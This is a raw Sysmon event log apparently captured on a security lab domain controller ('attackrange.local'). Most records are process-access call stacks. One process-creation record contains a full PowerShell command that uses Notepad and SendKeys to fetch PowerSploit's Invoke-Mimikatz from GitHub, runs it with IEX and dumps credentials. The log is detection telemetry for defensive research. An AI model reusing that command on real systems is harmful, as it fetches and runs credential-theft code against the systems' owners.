16:56:25.608{05ADC7E1-6CB1-603E-35AA-00000000AD01}148289956C:\Windows\system32\conhost.exe{05ADC7E1-6E39-603E-FBAA-00000000AD01}4676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244056Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:25.608{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6E39-603E-FBAA-00000000AD01}4676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FF829F94433) 10341000x80000000000000002244055Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:25.608{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244054Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:25.608{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244053Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:25.608{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244052Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:25.608{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244051Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:25.608{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6E39-603E-FBAA-00000000AD01}4676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002244050Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:25.608{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6E39-603E-FBAA-00000000AD01}4676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3743(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b35b7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f535de3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4ac19f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65392(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4a82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4e1471(wow64) 154100x80000000000000002244049Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:25.612{05ADC7E1-6E39-603E-FBAA-00000000AD01}4676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr} C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000002244048Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:25.608{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-02 16:56:11.776 11241100x80000000000000002244047Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:25.608{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-02 16:56:11.773 23542300x80000000000000002244046Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:25.545{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\art-out.txtMD5=E034B639FD06D8BE47ED3BD328CA0578,SHA256=433FF713043217547E48416D4009C0E033A8632A30B33D3534902A097BCA16F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002244045Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:25.475{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9EEAE0303FEA0ECA07F69539D82AB84B,SHA256=377E954E832B8898D742E51CE578B8B8E58E4014CF1253AA2C5F553480153AE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002244044Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:25.474{05ADC7E1-6E37-603E-FAAA-00000000AD01}4836ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002244043Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:25.272{05ADC7E1-6E37-603E-FAAA-00000000AD01}4836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\Default_File_Path.ps12021-03-01 22:53:33.433 23542300x80000000000000002244042Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:25.271{05ADC7E1-6E37-603E-FAAA-00000000AD01}4836ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\Default_File_Path.ps1MD5=DCE6250005968B2E1003165602177255,SHA256=4013A9DB2598C677B34A6C4753E91216B844C567D5110931647C38680DE03BAF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002244041Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:15.096{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local59025- 354300x80000000000000002244040Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:14.362{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local56670- 10341000x80000000000000002244170Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.811{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018FEF55)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000002244169Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.811{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018FEF55)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000002244168Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.811{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018FEF55)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000002244167Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.811{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018FEF55)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000002244166Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.811{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018FEF55)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000002244165Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.811{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018FEF55)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000002244164Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.811{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000002244163Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.811{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026